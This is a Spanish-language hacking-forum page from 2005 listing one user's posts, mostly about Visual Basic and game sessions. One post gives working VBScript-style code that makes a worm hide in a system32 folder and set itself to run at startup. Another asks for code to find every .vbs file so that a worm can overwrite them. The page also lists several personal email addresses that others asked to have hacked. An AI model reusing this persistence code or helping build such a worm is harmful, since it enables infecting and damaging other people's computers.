elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: 1 ... 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 [126] 127 128 129 130 131
1251  Programación / Programación Visual Basic / Re: Gusano!! en: 25 Junio 2005, 12:10 pm
Te voy a poner aqui un código básico para infectar un equipo con tu gusano:
Código:
Set sh = CreateObject("WScript.Shell")
Set ficheros = CreateObject("Scripting.FileSystemObject")
ficheros.CreateFolder "C:\Windows\system32\privatesystem"
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Windows\system32\privatesystem" & "\" & "virus" & ".exe"
Call SetAttr("C:\Windows\system32\privatesystem" & "\virus.EXE", vbHidden)
sh.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\private", "C:\Windows\system32\privatesystem\virus.exe"
Con esto se copia el fichero a una carpeta de system32 creada tu antes, se oculta el programa para que el usuario no lo pueda borrar o le sea mas dificil y luego se registra como aplicación de arranque en HKEY_LOCAL_MACHINE.
1252  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Humor Amarillo (Actualizado 7-01-05) en: 24 Junio 2005, 21:39 pm
Citar
:DHola brother, sabes chochera me gustaria que me ayudaras plis con 3 correitos de 3 flacas de verdad que son de mi estudio y una es mi flaca tu sabes la quiro chequear broders. Cool plis broders

Porfa me puedes enviar al siguiente correo:
superagente5000@hotmail.com

Los 3 corres:
rosa25rt@hotmail.com <rosa25rt@hotmail.com>
zanguita12@hotmail.com
cyberluz17@hotmail.com <cyberluz17@hotmail.com>

Plis broders... Grin
;D ;D ;D ;D No puedo de la risa jajaja... Es una broma o estoy soñando???  ;D
Citar
Hola soy un principiante en el mundo del hacking en bases de UNIX y LINUX quisiera mas o menos tener idea o base para hackear una cuenta de hotmail... solo por conocimientos basicos no para hacer maldad si me aconsejan algun texto o programa bases.. porfavor me seria de mucha ayuda
Que tiene que ver linux y unix con hotmial y con el correo  ;D esto si que es gracioso ;D ;D ;D
Y aqui hay otros mios:
Citar
A veces me llegan a mi correo mensajes de gente que les hacke el correo y me ponen:
Hola me gustaría que enseñaras a ser un hacker de verdad y me gustaría saber como hackear un correo de hotmail, ¿tu cual usas?  o otro
Toma te doy estos correos y hackeamelos por favor.
¡¡¡PERO QUE SE CREEN ALGUNOS QUE NO TENGO MAS ESTUPIDECES QUE HACER QUE HACKEAR CORREOS DE EMAIL.  ;D
Otro caso es de uno de este foro que estuve hablando con el sobre visual basic.
Citar
Me equivoco en una cosa que devería saber acerla sin problemas. Puse timer1.enabled y se me olvido poner timer1.enabled = true porque iba deprisa y ni se dio cuenta.   
Esto me lo pusieron en una web de la que soy administrador adjunto:
Citar
Quiero que me hackes tal web, yo es que no se y vosotros seguro que sabeis. A ver si me lo dais lo antes posibles. PERO ESTOS QUE SE CREEN QUE YO TENGO COMO OFICIO EL HACK DE WEB. ; >:(
Estas son las que recuerdo pero seguro que hay mas espero que hos sean graciosas  :D
1253  Media / Juegos y Consolas / Re: Partidas age of empires the age of king en: 24 Junio 2005, 21:23 pm
Voy a dejar abierta la partida hasta la 10 de la noche hora española. Si nadie se conecta la cerraré.
Hos podeis conectar usando mi host que mencione arriba o usando la ip que tengo en este momento.  81.32.22.186
Espero que se una la gente
1254  Media / Juegos y Consolas / Re: Partidas age of empires the age of king en: 24 Junio 2005, 16:39 pm
Tengo ya el servidor en: ftpwebcounter.no-ip.info
1255  Media / Juegos y Consolas / Re: Partidas age of empires the age of king en: 24 Junio 2005, 14:54 pm
Ya me he descargado el conqueros. ¿A que hora echamos la partida en el mapa de harry potter?.
1256  Programación / Programación Visual Basic / Re: VISUAL BASIC en: 24 Junio 2005, 13:22 pm
Ok, la proxima vez diré en el foro que busquen en el foro el tutorial no les pondre la url. Aunque tienes razon creo que he hecho un poco de spam. Lo siento.
1257  Programación / Programación Visual Basic / Re: Ver ficheros *vbs en: 24 Junio 2005, 11:24 am
Gracias y perdón por no buscar
1258  Programación / Programación Visual Basic / Ver ficheros *vbs en: 23 Junio 2005, 23:52 pm
Hola, necesito un código para ver todos los ficheros *.vbs que pueda a ver en un ordenador. Y que te los valla mostrando de uno en uno, no todo seguido. Lo quiero para un gusano que estoy haciendo. Al encontrar un fichero , lo abre borra todo lo que tiene y añade un nuevo código. Por eso necesito saber como encontrarlos. He probado con el dirbox y filebox y no he tenido mucha suerte a si que si me pueden ayudar lo agradecería.
1259  Programación / Programación Visual Basic / Re: blokear ctrl+alt+supr en: 23 Junio 2005, 23:36 pm
Citar
reydelmundo no se para que le has dado "tu" manual de vb script...no agas tanto SPAM
le he puesto porque lo que tu pones es solo para ocultar la aplicación del administrador de tareas no ocultar el administrador de tareas.
El tutorial lo pongo porque hay pone como modificar una entrada del registro.
Además no hago SPAM lo pongo cuando es necesario y le hice porque muchas preguntas que ocurren en este foro son para el registro de windows. ej : que si iniciar apliacion al arranque, que si desabilitar, etc...
Por cierto pone como quitar el administrador de tareas no como ocultar el programa ante el administrador de tareas.

1260  Programación / Programación Visual Basic / Re: PROTEGER APLICACION en: 23 Junio 2005, 21:01 pm
Se me ocurre que crees alguna entrada en el registro y le vas sumando uno por cada inicio y que cuando llege a 15 el programa deje de funcionar. Así solo vale para usarle 15 veces el programa.
Si lo que quieres es que sea de tiempo, días etc.. con cambiar la fecha vale por decir mas con formatear el disco duro vale.
Páginas: 1 ... 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 [126] 127 128 129 130 131
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines